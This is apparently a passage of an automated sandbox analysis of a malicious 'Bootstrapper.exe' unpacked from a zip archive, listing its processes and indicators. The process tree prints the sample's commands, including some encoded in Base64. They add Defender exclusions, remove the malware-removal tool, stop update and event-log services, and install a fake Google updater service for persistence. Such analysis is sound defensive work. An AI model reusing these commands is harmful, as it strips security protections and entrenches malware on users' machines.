\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe -
NTFS ADS 5 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 234651.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\NDP481-Web.exe:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 538170.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 233820.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\ndp48-web.exe:Zone.Identifier msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1620 7zFM.exe 1620 7zFM.exe 1604 powershell.exe 1448 powershell.exe 1448 powershell.exe 1604 powershell.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 2552 powershell.exe 1620 7zFM.exe 1620 7zFM.exe 4012 powershell.exe 4012 powershell.exe 2552 powershell.exe 388 Bootstrapper.exe 1568 powershell.exe 1568 powershell.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 388 Bootstrapper.exe 1620 7zFM.exe 388 Bootstrapper.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 388 Bootstrapper.exe 388 Bootstrapper.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 388 Bootstrapper.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 388 Bootstrapper.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 388 Bootstrapper.exe 1620 7zFM.exe 1620 7zFM.exe 388 Bootstrapper.exe 388 Bootstrapper.exe 388 Bootstrapper.exe 388 Bootstrapper.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1620 7zFM.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
pid Process 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1620 7zFM.exe Token: 35 1620 7zFM.exe Token: SeSecurityPrivilege 1620 7zFM.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 1448 powershell.exe Token: SeSecurityPrivilege 1620 7zFM.exe Token: SeDebugPrivilege 2552 powershell.exe Token: SeDebugPrivilege 4012 powershell.exe Token: SeDebugPrivilege 1568 powershell.exe Token: SeShutdownPrivilege 3528 powercfg.exe Token: SeCreatePagefilePrivilege 3528 powercfg.exe Token: SeShutdownPrivilege 1236 powercfg.exe Token: SeCreatePagefilePrivilege 1236 powercfg.exe Token: SeShutdownPrivilege 1012 powercfg.exe Token: SeCreatePagefilePrivilege 1012 powercfg.exe Token: SeShutdownPrivilege 5032 powercfg.exe Token: SeCreatePagefilePrivilege 5032 powercfg.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeShutdownPrivilege 4184 powercfg.exe Token: SeCreatePagefilePrivilege 4184 powercfg.exe Token: SeShutdownPrivilege 2312 powercfg.exe Token: SeCreatePagefilePrivilege 2312 powercfg.exe Token: SeShutdownPrivilege 4376 powercfg.exe Token: SeCreatePagefilePrivilege 4376 powercfg.exe Token: SeShutdownPrivilege 4624 powercfg.exe Token: SeCreatePagefilePrivilege 4624 powercfg.exe Token: SeLockMemoryPrivilege 4204 explorer.exe Token: SeSecurityPrivilege 1620 7zFM.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 1032 powershell.exe Token: SeShutdownPrivilege 1336 powercfg.exe Token: SeCreatePagefilePrivilege 1336 powercfg.exe Token: SeShutdownPrivilege 3064 powercfg.exe Token: SeCreatePagefilePrivilege 3064 powercfg.exe Token: SeShutdownPrivilege 424 powercfg.exe Token: SeCreatePagefilePrivilege 424 powercfg.exe Token: SeShutdownPrivilege 3620 powercfg.exe Token: SeCreatePagefilePrivilege 3620 powercfg.exe Token: SeDebugPrivilege 1740 powershell.exe Token: SeShutdownPrivilege 3100 powercfg.exe Token: SeCreatePagefilePrivilege 3100 powercfg.exe Token: SeShutdownPrivilege 2180 powercfg.exe Token: SeCreatePagefilePrivilege 2180 powercfg.exe Token: SeShutdownPrivilege 3436 powercfg.exe Token: SeCreatePagefilePrivilege 3436 powercfg.exe Token: SeShutdownPrivilege 2500 powercfg.exe Token: SeCreatePagefilePrivilege 2500 powercfg.exe Token: SeDebugPrivilege 2488 Setup.exe Token: SeBackupPrivilege 3684 dism.exe Token: SeRestorePrivilege 3684 dism.exe Token: SeRestorePrivilege 2488 Setup.exe Token: SeBackupPrivilege 2488 Setup.exe Token: SeBackupPrivilege 2488 Setup.exe Token: SeSecurityPrivilege 1620 7zFM.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeShutdownPrivilege 4108 powercfg.exe Token: SeCreatePagefilePrivilege 4108 powercfg.exe Token: SeShutdownPrivilege 4776 powercfg.exe Token: SeCreatePagefilePrivilege 4776 powercfg.exe Token: SeShutdownPrivilege 3724 powercfg.exe Token: SeCreatePagefilePrivilege 3724 powercfg.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1620 7zFM.exe 1620 7zFM.exe 1620 7zFM.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe 2524 msedge.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4924 Bootstrapper.exe 1072 Bootstrapper.exe 768 ndp48-web.exe 3712 ndp48-web.exe 852 Bootstrapper.exe 1224 NDP481-Web.exe 2456 Bootstrapper.exe 3508 NDP481-Web.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1620 wrote to memory of 4924 1620 7zFM.exe 77 PID 1620 wrote to memory of 4924 1620 7zFM.exe 77 PID 1620 wrote to memory of 4924 1620 7zFM.exe 77 PID 4924 wrote to memory of 1448 4924 Bootstrapper.exe 80 PID 4924 wrote to memory of 1448 4924 Bootstrapper.exe 80 PID 4924 wrote to memory of 1448 4924 Bootstrapper.exe 80 PID 4924 wrote to memory of 1604 4924 Bootstrapper.exe 82 PID 4924 wrote to memory of 1604 4924 Bootstrapper.exe 82 PID 4924 wrote to memory of 1604 4924 Bootstrapper.exe 82 PID 4924 wrote to memory of 388 4924 Bootstrapper.exe 84 PID 4924 wrote to memory of 388 4924 Bootstrapper.exe 84 PID 1620 wrote to memory of 1072 1620 7zFM.exe 85 PID 1620 wrote to memory of 1072 1620 7zFM.exe 85 PID 1620 wrote to memory of 1072 1620 7zFM.exe 85 PID 1072 wrote to memory of 4012 1072 Bootstrapper.exe 86 PID 1072 wrote to memory of 4012 1072 Bootstrapper.exe 86 PID 1072 wrote to memory of 4012 1072 Bootstrapper.exe 86 PID 1072 wrote to memory of 2552 1072 Bootstrapper.exe 88 PID 1072 wrote to memory of 2552 1072 Bootstrapper.exe 88 PID 1072 wrote to memory of 2552 1072 Bootstrapper.exe 88 PID 1072 wrote to memory of 3604 1072 Bootstrapper.exe 90 PID 1072 wrote to memory of 3604 1072 Bootstrapper.exe 90 PID 3068 wrote to memory of 4972 3068 cmd.exe 98 PID 3068 wrote to memory of 4972 3068 cmd.exe 98 PID 4340 wrote to memory of 3908 4340 cmd.exe 129 PID 4340 wrote to memory of 3908 4340 cmd.exe 129 PID 4000 wrote to memory of 3752 4000 updater.exe 142 PID 4000 wrote to memory of 3752 4000 updater.exe 142 PID 4000 wrote to memory of 3752 4000 updater.exe 142 PID 4000 wrote to memory of 3752 4000 updater.exe 142 PID 4000 wrote to memory of 3752 4000 updater.exe 142 PID 4000 wrote to memory of 3752 4000 updater.exe 142 PID 4000 wrote to memory of 3752 4000 updater.exe 142 PID 4000 wrote to memory of 3752 4000 updater.exe 142 PID 4000 wrote to memory of 3752 4000 updater.exe 142 PID 4000 wrote to memory of 4204 4000 updater.exe 147 PID 4000 wrote to memory of 4204 4000 updater.exe 147 PID 4000 wrote to memory of 4204 4000 updater.exe 147 PID 4000 wrote to memory of 4204 4000 updater.exe 147 PID 4000 wrote to memory of 4204 4000 updater.exe 147 PID 564 wrote to memory of 2496 564 msedge.exe 150 PID 564 wrote to memory of 2496 564 msedge.exe 150 PID 2524 wrote to memory of 4932 2524 msedge.exe 152 PID 2524 wrote to memory of 4932 2524 msedge.exe 152 PID 2524 wrote to memory of 876 2524 msedge.exe 153 PID 2524 wrote to memory of 876 2524 msedge.exe 153 PID 564 wrote to memory of 2592 564 msedge.exe 154 PID 564 wrote to memory of 2592 564 msedge.exe 154 PID 2524 wrote to memory of 876 2524 msedge.exe 153 PID 564 wrote to memory of 2592 564 msedge.exe 154 PID 2524 wrote to memory of 876 2524 msedge.exe 153 PID 564 wrote to memory of 2592 564 msedge.exe 154 PID 2524 wrote to memory of 876 2524 msedge.exe 153 PID 564 wrote to memory of 2592 564 msedge.exe 154 PID 2524 wrote to memory of 876 2524 msedge.exe 153 PID 2524 wrote to memory of 876 2524 msedge.exe 153 PID 564 wrote to memory of 2592 564 msedge.exe 154 PID 564 wrote to memory of 2592 564 msedge.exe 154 PID 2524 wrote to memory of 876 2524 msedge.exe 153 PID 2524 wrote to memory of 876 2524 msedge.exe 153 PID 564 wrote to memory of 2592 564 msedge.exe 154 PID 2524 wrote to memory of 876 2524 msedge.exe 153 PID 564 wrote to memory of 2592 564 msedge.exe 154 PID 2524 wrote to memory of 876 2524 msedge.exe 153
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\20-12-2024_UqVE2XPvW38Pgkj.zip"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Users\Admin\AppData\Local\Temp\7zO4565B687\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\7zO4565B687\Bootstrapper.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAagBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAdABmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAG8AcgA6ACAAQwBvAHUAbABkACAAbgBvAHQAIABzAHQAYQByAHQAOgAgAC4ATgBFAFQAIABGAHIAYQBtAGUAdwBvAHIAawAgADQALgA4AC4AMQAgAG4AbwB0ACAAaQBuAHMAdABhAGwAbABlAGQALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAbQBxAGcAIwA+AA=="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAcgB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAbQBpACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:388 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4972
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1004
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4480
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:404
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:2380
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:5036
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:1116
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:1436
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:4664
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO4569FED7\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\7zO4569FED7\Bootstrapper.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAagBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAdABmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAG8AcgA6ACAAQwBvAHUAbABkACAAbgBvAHQAIABzAHQAYQByAHQAOgAgAC4ATgBFAFQAIABGAHIAYQBtAGUAdwBvAHIAawAgADQALgA4AC4AMQAgAG4AbwB0ACAAaQBuAHMAdABhAGwAbABlAGQALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAbQBxAGcAIwA+AA=="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAcgB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAbQBpACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"3⤵
- Executes dropped EXE
PID:3604
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO456DBD59\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\7zO456DBD59\Bootstrapper.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAagBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAdABmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAG8AcgA6ACAAQwBvAHUAbABkACAAbgBvAHQAIABzAHQAYQByAHQAOgAgAC4ATgBFAFQAIABGAHIAYQBtAGUAdwBvAHIAawAgADQALgA4AC4AMQAgAG4AbwB0ACAAaQBuAHMAdABhAGwAbABlAGQALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAbQBxAGcAIwA+AA=="3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAcgB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAbQBpACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:240 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2280
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:3232
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:4252
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1756
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1992
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:4120
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:1500
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:424
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3620
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2472
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:404
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zO456F93FA\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\7zO456F93FA\Bootstrapper.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAagBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAdABmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAG8AcgA6ACAAQwBvAHUAbABkACAAbgBvAHQAIABzAHQAYQByAHQAOgAgAC4ATgBFAFQAIABGAHIAYQBtAGUAdwBvAHIAawAgADQALgA4AC4AMQAgAG4AbwB0ACAAaQBuAHMAdABhAGwAbABlAGQALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAbQBxAGcAIwA+AA=="3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
